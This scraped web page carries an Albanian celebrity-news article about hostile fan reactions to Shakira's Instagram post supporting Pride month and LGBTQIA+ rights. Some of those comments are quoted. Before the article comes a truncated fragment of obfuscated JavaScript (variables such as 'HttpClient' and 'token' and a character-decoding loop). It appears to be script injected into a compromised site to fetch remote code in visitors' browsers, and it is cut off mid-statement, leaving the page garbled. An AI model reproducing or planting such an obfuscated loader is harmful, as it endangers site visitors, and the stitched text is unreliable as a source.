;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shakira nuk përkrahet nga fansat për këtë veprim!

By

Shakira, një nga artistet më të njohura në botë, vazhdon të mbajë vëmendjen e miliona fansave të saj në çdo hap të saj.

Disa prej tyre e përkrahin në çdo hap, e disa të tjerë s’i kursejnë kritikat kur artistja shfaqë qëndrimet e saj.

Në një postim të fundit në Instagram, ajo ngarkoi një foto për të festuar muajin e Krenarisë, duke shprehur mbështetjen e saj të qartë për të drejtat e komunitetit LGBTQIA+.

“Shpresoj që të gjithë të keni pasur një muaj të mrekullueshëm të Krenarisë! Gjithmonë mbështes barazinë, lirinë e dashurisë dhe miqësisë!”, shkruante ajo në postimin e saj.

Kjo shprehje e hapur e mbështetjes për një çështje të rëndësishme shoqërore nuk u prit me duart e hapura nga të gjithë, duke shkaktuar reagime të ndryshme në komentet nën postimin e saj.

Me këto komente nuk më habit pse Amerika Latine është ashtu siç është”, “Zoti im, çfarë po ndodh me botën”, “Përkrah degradimin e njerëzimit”, “Beso, lamtumirë”, “Shakira, ti ke fëmijë, analizoji gjërat si një nënë e përgjegjshme dhe promovo etikën e duhur për mbrojtjen e fëmijëve”, ishin vetëm disa nga përgjigjet më të ashpra që këngëtarja mori për fotografinë e saj.

 

 

 

 

Artikuj të ngjashëm